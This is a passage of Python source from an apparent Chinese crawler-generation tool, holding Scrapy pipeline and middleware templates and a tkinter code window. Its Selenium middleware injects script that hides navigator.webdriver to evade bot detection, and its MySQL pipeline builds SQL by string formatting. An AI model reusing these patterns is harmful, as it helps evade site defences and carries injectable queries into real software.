file_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', file_name).strip()[:80] if file_name else hashlib.md5(url.encode()).hexdigest()
if not file_type:
file_type = request.url.rsplit('.', 1)[-1]
file_type = file_type if '/' not in file_type else 'unknown'
return '{}.{}'.format(file_name, file_type)
def item_completed(self, results, item, info): # 判断下载是否成功
k, v = results[0]
item['file_download_stat'] = 'success' if k else 'fail'
item['file_path'] = os.path.join(VFilePipeline.FILES_STORE, v['path']).replace('\\\\', '/') if k else None # 保留文件名地址
if not k: logging.info('download fail {}'.format(item))
else: logging.info('download success {}'.format(item))
return item
# 阿里 Oss 文件上传中间件模板
# 依赖 pip install oss2
class VOssPipeline:
BUCKET_STORE = None
@classmethod
def from_crawler(cls, crawler):
s = cls()
import oss2
aid = 'kkkkkkkkkkkkkkkkkkkkkkkk'
ack = 'vvvvvvvvvvvvvvvvvvvvvvvvvvvvvv'
enp = 'http://oss-cn-hangzhou.aliyuncs.com'
_bucket = '<bucket name>'
VOssPipeline.BUCKET_STORE = oss2.Bucket(oss2.Auth(aid,ack), enp, _bucket)
return s
def process_item(self, item, spider):
# 示例: 用于将下载到的图片上传到Oss的代码如下
# ipath = item.get('image_path')
# if ipath and os.path.isfile(ipath): self.update_data(ipath, ipath)
return item
def update_data(self, object_name, localfile_name):
VOssPipeline.BUCKET_STORE.put_object_from_file(object_name, localfile_name)
# import you_get.extractors # 使用 pyinstaller 打包 you-get 时,需要在全局环境显式导入该行代码,让 pyinstaller 自动包含该库内容
# from youtube_dl import YoutubeDL # 使用 pyinstaller 打包 youtube-dl 时,需要在全局环境显式导入该行代码,让 pyinstaller 自动包含该库内容
# 视频下载 item 中间件
import os, sys
import logging, hashlib, traceback
from scrapy.exceptions import NotConfigured
class VVideoPipeline(object):
MEDIAS_STORE = None
@classmethod
def from_crawler(cls, crawler):
s = cls(crawler.settings)
return s
def __init__(self, settings=None):
VVideoPipeline.MEDIAS_STORE = settings.get('MEDIAS_STORE')
if not VVideoPipeline.MEDIAS_STORE:
err = 'before use VVideoPipeline. pls set MEDIAS_STORE first !!!'
logging.error('\\n--------------\\n{}\\n--------------'.format(err))
raise NotConfigured
def process_item(self, item, spider):
url = item['src']
localpage_ = os.path.dirname(os.path.realpath(sys.argv[0])) # 确保下载路径为“该脚本”或“被pytinstaller打包时候的工具”路径下的video文件夹
localpage = os.path.join(localpage_, VVideoPipeline.MEDIAS_STORE)
try:
### 【you-get】
# import you_get.common
# you_get.common.skip_existing_file_size_check = True # 防止发现重复视频时会强制要求输入“是否覆盖”,卡住程序,默认不覆盖
# you_get.common.any_download(url, output_dir=localpage, merge=True, info_only=False)
### 【youtube-dl】 (推荐使用这个,因为这个在存储的文件名字的自定义存储上会更强)
from youtube_dl import YoutubeDL
file_name, file_type = item.get('file_name'), item.get('file_type')
fpath = '{}/%(title)s.%(ext)s'.format(item.get('file_path').strip('/\\\\')) if item.get('file_path') else '%(title)s.%(ext)s'
fpath = os.path.join(localpage, fpath).replace('\\\\', '/')
fpath = fpath.replace('%(title)s', file_name) if file_name else fpath
fpath = fpath.replace('%(ext)s', file_type) if file_type else fpath
ytdl = YoutubeDL({'outtmpl': fpath, 'ffmpeg_location':None}) # 如果已配置ffmpeg环境则不用修改
info = ytdl.extract_info(url, download=True)
dpath = {}
if '%(title)s' in fpath: dpath['title'] = info['title']
if '%(ext)s' in fpath: dpath['ext'] = info['ext']
path = fpath % dpath
item['media_download_stat'] = 'success'
item['media_path'] = path.replace(localpage_.replace('\\\\', '/'), '.') # 保留文件名地址
logging.info('download success {}'.format(item))
except:
item['media_download_stat'] = 'fail'
item['media_path'] = None
logging.info('download fail {}'.format(item))
logging.info('download reason {}'.format(traceback.format_exc()))
return item
# 数据库上传 item 中间件(不考虑字段类型处理,每个字段统统使用 MEDIUMTEXT 类型存储 json.dumps 后的 value)
# 如果有数据库字段类型的个性化处理,请非常注意的修改 insert_item 和 init_database 两个函数中对于字段类型的初始化、插入的处理,process_item无需修改。
import hmac, logging, traceback
from twisted.enterprise import adbapi
class VMySQLPipeline(object):
dbn = {}
def process_item(self, item, spider):
mysql_config = item.pop('__mysql__', None) # 存储时自动删除配置
if mysql_config and item:
if type(mysql_config) is dict:
table = mysql_config.pop('table', None)
db = mysql_config.get('db', None) or 'vrequest'
mysql_config.setdefault('charset','utf8mb4')
mysql_config.setdefault('db', db)
dbk = hmac.new(b'',json.dumps(mysql_config, sort_keys=True).encode(),'md5').hexdigest()
if dbk not in self.dbn:
self.dbn[dbk] = adbapi.ConnectionPool('pymysql', **mysql_config)
self.init_database(self.dbn[dbk], mysql_config, db, table, item)
self.dbn[dbk].runInteraction(self.insert_item, db, table, item)
return item
else:
raise TypeError('Unable Parse mysql_config type:{}'.format(type(mysql_config)))
else:
return item
def insert_item(self, conn, db, table, item):
table_sql = ''.join(["'{}',".format(json.dumps(v, ensure_ascii=False).replace("'","\\\\'")) for k,v in item.items()])
insert_sql = 'INSERT INTO `{}`.`{}` VALUES({})'.format(db, table, table_sql.strip(','))
try:
conn.execute(insert_sql)
logging.info('insert sql success')
except Exception as e:
logging.info('insert sql fail: {}'.format(insert_sql))
logging.error(traceback.format_exc())
def init_database(self, pool, mysql_config, db, table, item):
# 需要注意的是,在一些非常老的版本的mysql 里面并不支持 utf8mb4。这是 mysql 的设计缺陷,赶紧使用大于 5.5 版本的 mysql !
# 创建db,创建表名,所有字段都以 MEDIUMTEXT 存储,用 json.dumps 保证了数据类型也能存储,后续取出时只需要每个值 json.loads 这样就能获取数据类型
# 例如一个数字类型 123 -> json.dumps -> '123' -> json.loads -> 123,统一类型存储,取出时又能保证数据类型,这种处理会很方便
# MEDIUMTEXT 最大能使用16M 的长度,所以对于一般的 html 文本也非常足够。如有自定义字段类型的需求,请注意修改该处。
db, charset = mysql_config.pop('db'), mysql_config.get('charset')
try:
conn = pool.dbapi.connect(**mysql_config)
cursor = conn.cursor()
table_sql = ''.join(['`{}` MEDIUMTEXT NULL,'.format(str(k)) for k,v in item.items()])
cursor.execute('Create Database If Not Exists {} Character Set {}'.format(db, charset))
cursor.execute('Create Table If Not Exists `{}`.`{}` ({})'.format(db, table, table_sql.strip(',')))
conn.commit(); cursor.close(); conn.close()
except Exception as e:
traceback.print_exc()
# scrapy 默认项目中的 SPIDER_MIDDLEWARES,DOWNLOADER_MIDDLEWARES 中间件的模板,按需修改
from scrapy import signals
class VSpiderMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
return None
def process_spider_output(self, response, result, spider):
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
pass
def process_start_requests(self, start_requests, spider):
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class VDownloaderMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
return None
def process_response(self, request, response, spider):
return response
def process_exception(self, request, exception, spider):
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
# 配置 selenium 的使用方式
import time
from scrapy.http import HtmlResponse
class VSeleniumMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(s.spider_closed, signal=signals.spider_closed)
return s
def process_request(self, request, spider):
try:
self.webdriver.get(url=request.url)
time.sleep(2)
# 部分智能等待的代码,提高浏览器效率的处理
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.support.wait import WebDriverWait as wbw
# locator = (By.XPATH, '//img[@class="focus-item-img"]')
# # wbw(self.webdriver,10).until(EC.presence_of_element_located(locator)) # 判断某个元素是否被加到了dom树里
# wbw(self.webdriver,10).until(EC.visibility_of_element_located(locator)) # 判断某个元素是否被添加到了dom里并且可见,即宽和高都大于0
current_url = self.webdriver.current_url
page_source = self.webdriver.page_source
except Exception as e:
return self._parse_selenium_temp_exceptions(request, spider, e)
# 若是出现请求异常(验证码,或者重新登陆之类的处理),请在这里判断 page_source 是否是异常情况,并在这里处理重新进行登录或其他
h = HtmlResponse(
url = current_url,
headers = {'Selenium':'Selenium cannot get a certain headers, This is the information created automatically by middleware.'},
body = page_source,
encoding = 'utf-8',
request = request
)
return h
def process_response(self, request, response, spider):
return response
def spider_opened(self, spider):
spider.logger.info('Spider %s opened: %s' % (self.__class__.__name__, spider.name))
self._open_webdriver()
self._login()
def spider_closed(self):
if getattr(self, 'webdriver', None): self.webdriver.quit()
def _parse_selenium_temp_exceptions(self, request, spider, e):
stats = spider.crawler.stats
if 'Failed to establish a new connection' in str(e): # 仅仅捕捉浏览器异常关闭的异常,尝试重启,并重新将请求发送到队列
if getattr(self, 'restart_show_toggle', None) is None:
self.restart_show_toggle = True
if self.restart_show_toggle:
self.restart_show_toggle = False # 让 Catch webdriver 仅显示一次
spider.logger.info('Catch webdriver exception:{}, try to restart webdriver.'.format(e.__class__))
self._open_webdriver()
retries = request.meta.get('selenium_retry_times', 0) + 1 # 在 selenium 异常无法重启处理情况下一个请求最多尝试共3次请求
if retries <= 3:
retryreq = request.copy()
retryreq.meta['selenium_retry_times'] = retries
retryreq.dont_filter = True
stats.inc_value('selenium_retry/count')
return retryreq
else:
stats.inc_value('selenium_retry/max_reached')
spider.logger.info("Gave up selenium_retrying %(request)s (failed %(retries)d times)",
{'request': request, 'retries': retries})
else:
stats.inc_value('selenium_unknow_error/count')
stats.inc_value('selenium_unknow_error/reason_count/%s' % e.__class__.__name__)
import traceback
spider.logger.info('\\n'+traceback.format_exc().strip())
def _open_webdriver(self): # 该函数同时作为重启 webdriver 功能使用
try: self.spider_closed()
except: pass
from selenium import webdriver
option = webdriver.ChromeOptions()
extset = ['enable-automation', 'ignore-certificate-errors']
ignimg = "profile.managed_default_content_settings.images"
mobile = {'deviceName':'Galaxy S5'}
option.add_argument("--disable-infobars") # 旧版本关闭“chrome正受到自动测试软件的控制”信息
option.add_experimental_option("excludeSwitches", extset) # 新版本关闭“chrome正受到自动测试软件的控制”信息
option.add_experimental_option("useAutomationExtension", False) # 新版本关闭“请停用以开发者模式运行的扩展程序”信息
# option.add_experimental_option('mobileEmulation', mobile) # 是否使用手机模式打开浏览器
# option.add_experimental_option("prefs", {ignore_image: 2}) # 开启浏览器时不加载图片(headless模式该配置无效)
# option.add_argument('--start-maximized') # 开启浏览器时是否最大化(headless模式该配置无效)
# option.add_argument('--headless') # 【*】 无界面浏览器,linux 使用 selenium 必须配置该项
# option.add_argument('--no-sandbox') # 【*】 关闭沙箱模式,linux 使用 selenium 必须配置该项
# option.add_argument('--disable-dev-shm-usage') # 【*】 你只需要知道,linux 使用 selenium 需要尽量配置该项
# option.add_argument('--window-size=1920,1080') # 无界面打开浏览器时候只能用这种方式实现最大化
# option.add_argument('--disable-gpu') # 禁用 gpu 硬件加速
# option.add_argument("--auto-open-devtools-for-tabs") # 开启浏览器时候是否打开开发者工具(F12)
# option.add_argument("--user-agent=Mozilla/5.0 VILAME") # 修改 UA 信息
# option.add_argument('--proxy-server=http://127.0.0.1:8888') # 增加代理
self.webdriver = webdriver.Chrome(chrome_options=option)
try:
# 让每打开一个网页首先执行部分 js代码,下面 js代码可以绕过部分 webdriver 检测。
self.webdriver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
"source": """
Object.defineProperty(navigator, 'webdriver', {
get: () => undefined
});
"""
})
self.webdriver.execute_cdp_cmd("Network.enable", {})
except:
import traceback
print('[ ERROR! ] error in selenium webdriver execute_cdp_cmd func.')
print(traceback.format_exc())
def _login(self):
# 如果有登录处理,则写在这里
pass
# 定时任务执行插件
import types
import scrapy
from scrapy.exceptions import DontCloseSpider
from twisted.internet import task, defer, reactor
from scrapy import signals
class TimerRequest(object):
def __init__(self, crawler, interval):
self.interval = interval
self.task = None
self.crawler = crawler
@classmethod
def from_crawler(cls, crawler):
o = cls(crawler, crawler.settings.get('TIMER_INTERVAL') or 3)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(o.spider_closed, signal=signals.spider_closed)
crawler.signals.connect(o.spider_idle, signal=signals.spider_idle)
return o
def spider_opened(self, spider):
self.task = task.LoopingCall(self.new_request, spider)
if getattr(spider, 'timer_task', None):
d = defer.Deferred()
reactor.callLater(self.interval, self.task.start, self.interval)
else:
print('[ WARNING! ] Spider does not have timer_task function')
def new_request(self, spider):
r = getattr(spider, 'timer_task', None)()
if isinstance(r, scrapy.Request):
self.crawler.engine.crawl(r, spider=spider)
elif isinstance(r, (types.GeneratorType, list)):
for i in r:
if isinstance(i, scrapy.Request):
self.crawler.engine.crawl(i, spider=spider)
def spider_closed(self, spider, reason):
if self.task and self.task.running:
self.task.stop()
def spider_idle(self):
raise DontCloseSpider
'''
_single_script_middleware_new2 = '''
# 【中间件/管道配置】
# 这里使用中间件的方式和项目启动很相似,我在头部打了补丁函数,现在管道配置的第一个值可以同时用字符串或类配置,突破了原版只能用字符串的限制。
'IMAGES_STORE': 'image', # 默认在该脚本路径下创建文件夹、下载【图片】(不解开 VImagePipeline 管道注释则该配置无效)
'FILES_STORE': 'file', # 默认在该脚本路径下创建文件夹、下载【文件】(不解开 VFilePipeline 管道注释则该配置无效)
'MEDIAS_STORE': 'media', # 默认在该脚本路径下创建文件夹、下载【媒体】(不解开 VVideoPipeline 管道注释则该配置无效)
'ITEM_PIPELINES': {
# VPipeline: 101, # 普通的中间件使用(解开即可测试,如需魔改,请在脚本顶部找对应的类进行自定义处理)
# VImagePipeline: 102, # 图片下载中间件,item 带有 src 字段则以此作为图片地址下载到 IMAGES_STORE 地址的文件夹内
# VFilePipeline: 103, # 文件下载中间件,item 带有 src 字段则以此作为文件地址下载到 FILES_STORE 地址的文件夹内
# VVideoPipeline: 104, # 视频下载中间件,item 带有 src 字段则以此作为媒体地址下载到 MEDIAS_STORE 文件夹内
# VMySQLPipeline: 105, # MySql 插入中间件,具体请看类的描述
# VOssPipeline: 106, # 将本地数据上传到 OSS 空间的管道模板,注意修改模板内 process_item 函数来指定上传文件地址
},
'SPIDER_MIDDLEWARES': {
# VSpiderMiddleware: 543, # 原版模板的单脚本插入方式
},
'DOWNLOADER_MIDDLEWARES': {
# VDownloaderMiddleware: 543, # 原版模板的单脚本插入方式
# VSeleniumMiddleware: 544, # 单脚本 Selenium 中间件配置,解开自动使用 Selenium,详细请看 VSeleniumMiddleware 类中间件代码。
},
'TIMER_INTERVAL': 1, # 定时执行任务插件参数,打开 TimerRequest 插件注释即可使用,如未设置默认为3
'EXTENSIONS': {
# TimerRequest: 101, # 定时执行任务插件,在 VSpider 类中定义一个名为 timer_task 的函数,将会自动每n秒执行一次,
# 如果 timer_task 返回的结果是 scrapy.Request 对象或该对象列表(或迭代器)则自动发出请求。
# 开启该插件后脚本将不会自动停止。
# 'scrapy.extensions.logstats.LogStats': None,
# 关闭 scrapy EXTENSIONS默认中间件方式如上,程序执行时,日志的头部有当前任务都有哪些中间件加载,按需在对应管道中配置为 None 即可关闭
# 同理 SPIDER_MIDDLEWARES / DOWNLOADER_MIDDLEWARES 这两个“中间件配置”字典也可以用相同的方式关掉 scrapy 默认组件
# 【*】注意:不同分类的默认中间件需在对应分类的“中间件配置”字典中配置才能关闭,
},'''
# 生成代码临时放在这里
def scrapy_code_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
if setting.get('type') == 'request':
va,prox = setting.get('fr_proxy')
proxy = prox.get().strip() if va.get() else None
if setting.get('type') == 'response':
proxy = setting.get('fr_setting').get('proxy')
if proxy and setting.get('code_string'):
rep = "proxy = None # 'http://127.0.0.1:8888'"
rpl = "proxy = 'http://" +proxy+ "'"
setting['code_string'] = setting['code_string'].replace(rep, rpl)
def _execute_scrapy_code(*a):
from .tab import execute_scrapy_code
execute_scrapy_code()
def _execute_code(*a):
from .tab import execute_code
execute_code()
def save_project_in_desktop(*a):
name = askstring('项目名称','请输入项目名称,尽量小写无空格。')
if not name: return
desktop = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isdir(desktop):
with open(script,'w',encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
shutil.copytree(scrapypath, desktop)
# if hva.get():
# with open(desktop + '\\v\\spiders\\v.py','a',encoding='utf-8') as f:
# f.write('\n'*10 + post_verification_model)
toggle = tkinter.messagebox.askokcancel('创建成功',
'创建成功\n\n'
'注意!!!\n注意!!!\n注意!!!\n\n是否关闭当前工具并启动拷贝出的 shell 地址执行测试。\n'
'如果是,启动第一次shell测试后,后续需要再执行新的测试时请输入:\nscrapy crawl v\n\n'
'{}'.format(desktop))
if not toggle:
return
# cmd = 'start explorer {}'.format(desktop) # 打开文件路径
# os.system(cmd)
pyscript = os.path.join(os.path.split(sys.executable)[0],'Scripts')
toggle = any([True for i in os.listdir(pyscript) if 'scrapy.exe' in i.lower()])
if toggle:
scrapyexe = os.path.join(pyscript,'scrapy.exe')
output = '-o {}'.format(et.get()) if va.get() else ''
cwd = os.getcwd()
os.chdir(desktop)
try:
cmd = 'start powershell -NoExit "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
except:
cmd = 'start cmd /k "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
os.chdir(cwd)
cwd = os.getcwd()
else:
einfo = 'cannot find scrapy'
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
exit()
else:
tkinter.messagebox.showwarning('文件夹已存在','文件夹已存在')
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
home = os.environ.get('HOME')
home = home if home else os.environ.get('HOMEDRIVE') + os.environ.get('HOMEPATH')
filename = '.vrequest_scrapy'
scrapypath = os.path.join(home,filename)
scriptpath = os.path.join(scrapypath, 'v/spiders/')
script = os.path.join(scriptpath, 'v.py')
def local_collection(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': et.pack(side=tkinter.RIGHT)
if stat == 'hide': et.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
def _add_single_script_file_save(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
if 'os.path.join(os.path.expanduser("~")' not in script:
script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_comment(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
# if 'os.path.join(os.path.expanduser("~")' not in script:
# script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
if 'VImagePipeline' not in script:
# script = re.sub(r'p\.crawl\(VSpider\)', 'p.crawl(VSpider)\n\n' + single_script_comment_part2 + '\n', script)
script = script.replace(r'p.crawl(VSpider)', 'p.crawl(VSpider)\n\n' + single_script_comment_part2 + '\n')
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_comment_new(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
# if 'os.path.join(os.path.expanduser("~")' not in script:
# script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
if 'scrapy.utils.deprecate.update_classpath = _update_classpath' not in script:
key = "'DOWNLOAD_DELAY': 1, # 全局下载延迟,这个配置相较于其他的节流配置要直观很多"
script = script.replace(key, key+'\n'+_single_script_middleware_new2)
script = _single_script_middleware_new + '\n'*16 + script
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_distributed_comment(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
if "hook_to_scrapy_redis(namespace='default')" not in script:
script = _single_distributed + script
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_middleware_script_and_so_on(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '【推荐】新版单脚本添加中间件方式(支持原版排序)',
'【不推荐】旧版单脚本添加中间件方式(不支持用原版排序)',
'增加单脚本分布式的处理(代码增加在头部,详细使用请看注释)',
'增加列表请求(尚在开发,不好解释用途,不会影响原始代码)',
'增加绝对地址保存文件方式(win 系统 filename 使用绝对地址需加前缀)']
d = SimpleDialog(nb,
text="请选择一个增强功能",
buttons=q,
default=0,
cancel=-1,
title="选择")
id = d.go()
if id == -1: return
if id == 0: _add_single_script_comment_new()
if id == 1: _add_single_script_comment()
if id == 2: _add_single_script_distributed_comment()
if id == 3: _add_sceeper_in_list_model()
if id == 4: _add_single_script_file_save()
def _add_sceeper_in_list_model(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
if "meta['_plusmeta'] = {}" not in script:
q = re.findall(r'\n d\["([^"]+)"\] *=', script)
if not q: return
from .tab import nb
from .tab import SimpleDialog
d = SimpleDialog(nb,
text="请选择作为下一级请求链接的字段",
buttons=q,
default=0,
cancel=-1,
title="选择")
id = d.go()
if id == -1: return
script = script.replace(''' # If you need to parse another string in the parsing function.''',
''' _meta = response.meta.get('_plusmeta') or {}\n # If you need to parse another string in the parsing function.''')
script = script.replace('''meta = {}\n meta['proxy'] = self.proxy\n r = Request(''',
'''meta = {}\n meta['proxy'] = self.proxy\n meta['_plusmeta'] = {} # keys word transfer\n r = Request(''')
if 'from urllib.parse import unquote_plus, quote_plus' not in script:
_tempstring = _main_2_list_2_info_model.replace('lambda i:i.group(1)+quote_plus(unquote_plus(i.group(2)))', 'lambda i:i.group(1)+quote(unquote(i.group(2)))')
else:
_tempstring = _main_2_list_2_info_model
script = script.replace('''print('------------------------------ split ------------------------------')\n import pprint\n pprint.pprint(d)\n yield d''',
'''# print('------------------------------ split ------------------------------')\n # import pprint\n # pprint.pprint(d)\n # yield d''' \
+ _tempstring.replace("response.urljoin(d['href'])", "response.urljoin(d['{}'])".format(q[id])))
tx.delete(0.,tkinter.END)
tx.insert(0.,script)
tx.see(tkinter.END)
def pprint(*a):
__org_stdout__.write(str(a)+'\n')
__org_stdout__.flush()
temp_fr0 = Frame(fr)
va = tkinter.IntVar()
rb = Checkbutton(temp_fr0,text='本地执行是否收集数据',variable=va,command=local_collection)
rb.deselect()
et = Entry (temp_fr0,width=60)
ltime = '%04d%02d%02d-%02d%02d%02d' % time.localtime()[:6]
dtopfile = os.path.join('file:///' + os.path.expanduser("~"),'Desktop\\v{}.json'.format(ltime))
et.insert(0,dtopfile)
bt2 = Button(temp_fr0,text='保存单脚本到桌面',command=save_script_in_desktop)
bt2.pack(side=tkinter.LEFT)
bt3 = Button(temp_fr0,text='保存项目文件到桌面',command=save_project_in_desktop)
bt3.pack(side=tkinter.LEFT)
btn1 = Button(temp_fr0, text='执行项目代码 [Alt+w]', command=_execute_scrapy_code)
btn1.pack(side=tkinter.LEFT)
btn1_1 = Button(temp_fr0, text='窗口执行代码 [Alt+v]', command=_execute_code)
btn1_1.pack(side=tkinter.LEFT)
btn2 = Button(temp_fr0, text='【单脚本中间件/管道】', command=_add_middleware_script_and_so_on)
btn2.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='增加单脚本中间件功能', command=_add_single_script_comment)
# btn2.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='增加单脚本分布式功能', command=_add_single_script_distributed_comment)
# btn2.pack(side=tkinter.LEFT)
# btn4 = Button(temp_fr0, text='增加列表请求', command=_add_sceeper_in_list_model)
# btn4.pack(side=tkinter.LEFT)
# hva = tkinter.IntVar()
# hrb = Checkbutton(temp_fr0,text='拷贝项目增加后验证模板',variable=hva)
# hrb.deselect()
# hrb.pack(side=tkinter.LEFT)
cbx = Combobox(temp_fr0,width=10,state='readonly')
cbx['values'] = ('DEBUG','INFO','WARNING','ERROR','CRITICAL')
cbx.current(1)
cbx.pack(side=tkinter.RIGHT)
lab1 = Label(temp_fr0, text='项目启动日志等级:')
lab1.pack(side=tkinter.RIGHT)
def open_test(*a):
cmd = 'start explorer {}'.format(scrapypath)
os.system(cmd)
bt1 = Button(temp_fr0,text='打开本地文件路径',command=open_test)
bt1.pack(side=tkinter.RIGHT)
rb.pack(side=tkinter.RIGHT)
temp_fr1 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
tx = Text(temp_fr1,height=1,width=1,font=ft)
cs = setting.get('code_string')
if cs:
tx.delete(0.,tkinter.END)
tx.insert(0.,cs)
tx.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(tx).insertfilter(p)
except:
traceback.print_exc()
def execute_func_console():
if os.path.isdir(scriptpath):
with open(script,'w',encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
pyscript = os.path.join(os.path.split(sys.executable)[0],'Scripts')
toggle = any([True for i in os.listdir(pyscript) if 'scrapy.exe' in i.lower()])
if toggle:
scrapyexe = os.path.join(pyscript,'scrapy.exe')
output = '-o {}'.format(et.get()) if va.get() else ''
cwd = os.getcwd()
os.chdir(scriptpath)
try:
cmd = 'start powershell -NoExit "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
except:
cmd = 'start cmd /k "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
os.chdir(cwd)
else:
einfo = 'cannot find scrapy'
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
else:
einfo = 'cannot find path: {}'.format(scriptpath)
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb = Label (temp_fr2,text='执行结果[Esc 显示/隐藏执行结果]')
cd = Text (temp_fr2,height=1,width=1,font=ft)
lb.pack(side=tkinter.TOP)
cd.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
# 在 tkinter 里面实现线程真的稍微有点累人的。
import queue
Q = queue.Queue() # 用来传递打印的数据
S = queue.Queue() # 用来传递脚本数据
def execute_func_window():
# 额外的线程有一个非常需要注意的地方,就是涉及到任何使用 tkinter 内的结构的时候一定不能在这里实现
# 一定都要使用 Queue 来传递参数。窗口自己带一个超级递归的循环。
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
cs = cs.replace("# import io, sys; sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')", "import io, sys; sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')")
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = tx.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except queue.Empty:
import traceback
tkinter.messagebox.showinfo('Error',traceback.format_exc())
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def execute_func():
threading.Thread(target=execute_func_window).start()
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'scrapy'
frame_setting[fr]['execute_func_console'] = execute_func_console
frame_setting[fr]['execute_func'] = execute_func
frame_setting[fr]['fr_temp2'] = temp_fr2
return fr
# 帮助文档
def helper_window():
fr = Frame()
ft = Font(family='Consolas',size=10)
hp = '''
vrequest:
基于 requests 和 lxml 库的爬虫请求测试工具
用于快速发起请求,快速生成且能执行的基于 requests 和 lxml 的代码
也可以生成且能执行 scrapy 代码,不过由于scrapy库依赖过重,该工具不会依赖下载
若需要执行 scrapy 代码,需额外下载 scrapy。
*安装完整功能库(scrapy js2py jsbeautifier cryptography pillow)
通用快捷键 (该处多数功能右键窗口就能实现,只要记得右键窗口任意处即可):
(Ctrl + q) 创建新的请求标签
(Ctrl + j) 创建 js 代码执行窗口
(Ctrl + e) 修改当前标签名字
(Ctrl + w) 关闭当前标签
(Ctrl + h) 创建帮助标签
(Ctrl + s) 保存当前全部请求配置(只能保存请求配置)
(Ctrl + `) 直接打开IDLE
(Alt + `) 用IDLE固定打开一个文件,方便长脚本测试
请求窗口快捷键:
(Ctrl + r) 发送请求任务并保存
*(Alt + c) 生成请求代码(一般建议在请求后处理分析再生成代码,那样包含解析代码)
HEADERS 窗口接受 “:” 或 “=” 每行分割生成 字典参数
BODY 窗口接受 “:” 或 “=” 每行分割生成 字典参数
注意:对于 BODY 有时也会存在这里不需要对 dict 进行 urlencode 编码
的情况,这时候只要将传入的一行数据前后加上英文的双引号
